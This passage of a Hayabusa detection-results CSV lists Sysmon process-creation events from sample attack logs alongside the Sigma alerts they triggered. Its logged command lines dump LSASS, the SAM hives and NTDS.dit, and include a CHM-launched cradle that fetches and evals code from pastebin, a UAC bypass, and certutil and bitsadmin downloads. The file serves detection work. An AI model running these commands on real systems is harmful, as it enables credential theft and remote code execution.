Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:16.487 +09:00,MSEDGEWIN10,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:16.487 +09:00,MSEDGEWIN10,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:16.487 +09:00,MSEDGEWIN10,10,high,Mimikatz Detection LSASS Access,,rules/sigma/deprecated/sysmon_mimikatz_detection_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:16.986 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""gsecdump -a"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:17.027 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:17.107 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""wce -o output.txt"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:17.149 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:17.224 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\sam sam"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:17.243 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\sam sam : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\sam sam""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:21.090 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\system system"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:21.105 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\system system : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\system system""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:23.317 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\security security"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:23.336 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\security security : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\security security""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.549 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,critical,Suspicious Use of Procdump on LSASS,,rules/sigma/process_creation/win_susp_procdump_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,critical,Renamed ProcDump,,rules/sigma/process_creation/win_renamed_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,high,LSASS Memory Dumping,,rules/sigma/process_creation/win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,high,Suspicious Use of Procdump,,rules/sigma/process_creation/win_susp_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,low,Usage of Sysinternals Tools,,rules/sigma/process_creation/process_creation_sysinternals_eula_accepted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,medium,Procdump Usage,,rules/sigma/process_creation/win_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.686 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.852 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""ntdsutil “ac i ntds” “ifm” “create full C:\Atomic_Red_Team q q"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.884 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.971 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe create shadow /for=C:"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.989 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: vssadmin.exe create shadow /for=C: : Path: C:\Windows\System32\vssadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe create shadow /for=C:""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.989 +09:00,MSEDGEWIN10,1,medium,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.082 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.169 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extract\ntds.dit"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.169 +09:00,MSEDGEWIN10,1,high,Copying Sensitive Files with Credential Data,,rules/sigma/process_creation/win_copying_sensitive_files_with_credential_data.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,medium,Suspicious Copy From or To System32,,rules/sigma/process_creation/win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,high,Copying Sensitive Files with Credential Data,,rules/sigma/process_creation/win_copying_sensitive_files_with_credential_data.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.233 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.258 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:50.764 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:12:05.755 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\NOTEPAD.EXE"" C:\AtomicRedTeam\atomics\T1003\T1003.md : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-26 16:39:14.375 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\hh.exe"" C:\Users\IEUser\Desktop\Fax Record N104F.chm : Path: C:\Windows\hh.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx +2019-07-26 16:39:14.375 +09:00,MSEDGEWIN10,1,high,HH.exe Execution,,rules/sigma/process_creation/win_hh_chm.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx +2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c copy /Y C:\Windows\system32\rundll32.exe %%TEMP%%\out.exe > nul && %%TEMP%%\out.exe javascript:""\..\mshtml RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WinHttp.WinHttpRequest.5.1"");h.Open(""GET"",""http://pastebin.com/raw/y2CjnRtH"",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%%20ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im out.exe"",0,true);} : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\hh.exe"" C:\Users\IEUser\Desktop\Fax Record N104F.chm",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx +2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,high,HTML Help Shell Spawn,,rules/sigma/process_creation/win_html_help_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx +2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,medium,Suspicious Copy From or To System32,,rules/sigma/process_creation/win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx +2019-07-28 07:43:41.424 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Downloads\UACBypass.exe"" : Path: C:\Users\IEUser\Downloads\UACBypass.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:41.424 +09:00,MSEDGEWIN10,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:42.033 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: PrivEsc - UACBypass Mocking Trusted WinFolders : Command: ""C:\Windows \System32\winSAT.exe"" formal : Path: C:\Windows \System32\winSAT.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\UACBypass.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:42.033 +09:00,MSEDGEWIN10,1,critical,TrustedPath UAC Bypass Pattern,,rules/sigma/process_creation/win_susp_uac_bypass_trustedpath.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:42.161 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 6820 324 0000022557280720 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:42.392 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: PrivEsc - UACBypass Mocking Trusted WinFolders : Command: ""C:\Windows \System32\winSAT.exe"" formal : Path: C:\Windows \System32\winSAT.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\UACBypass.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:42.392 +09:00,MSEDGEWIN10,1,critical,TrustedPath UAC Bypass Pattern,,rules/sigma/process_creation/win_susp_uac_bypass_trustedpath.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-30 06:11:17.364 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\control.exe"" ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", : Path: C:\Windows\System32\control.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-30 06:11:17.587 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\rundll32.exe"" Shell32.dll,Control_RunDLL ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\control.exe"" ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"",",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-30 06:11:17.587 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-30 06:11:17.621 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\rundll32.exe"" Shell32.dll,Control_RunDLL ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"",",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-30 06:11:17.621 +09:00,MSEDGEWIN10,1,high,Suspicious Call by Ordinal,,rules/sigma/process_creation/win_susp_rundll32_by_ordinal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-30 06:11:19.098 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\wscript.exe"" /e:JScript.Encode /nologo C:\Users\IEUser\AppData\Local\Temp\info.txt : Path: C:\Windows\SysWOW64\wscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"",",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-30 06:11:19.098 +09:00,MSEDGEWIN10,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-30 06:32:55.583 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 6336 362 00000298E04230D0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:32:57.633 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:32:58.659 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c certutil -f -decode fi.b64 AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:32:58.659 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:32:58.711 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:32:59.234 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: certutil -f -decode fi.b64 AllTheThings.dll : Path: C:\Windows\System32\certutil.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c certutil -f -decode fi.b64 AllTheThings.dll ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:32:59.234 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.193 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.254 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.254 +09:00,MSEDGEWIN10,1,medium,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/process_creation_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.886 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1"" : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.886 +09:00,MSEDGEWIN10,1,medium,Bitsadmin 